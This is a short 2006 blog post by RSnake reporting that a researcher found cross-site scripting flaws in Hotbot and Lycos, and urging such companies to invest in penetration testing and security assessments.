As a fast follow up to my Hotbox XSS, David “Aesthetico” Vieira-Kurz just found another XSS exploit in Hotbot and one in Lycos. I can’t stress more how nasty things like this are.  These are trusted brands, and with the advent of nastier and nastier things that can be done with XSS (which I’ll go more into in August after Jeremiah Grossman returns from Blackhat) it is critical that these companies invest some time and money into penetration testing and security assessments in general.

Identity theft is a billion dollar industry, and these companies have a pretty huge responsibility for taking care of their users and identifying these risks before the security community does for them.  Investing in a good security penetration testing strategy is so important.  Of course, finding competant security assessment folks for web applications is really difficult, I’ve found.

/RSnake

This entry was posted on Monday, June 12th, 2006 at 9:54 am and is filed under XSS, Webappsec. You can leave a response as well.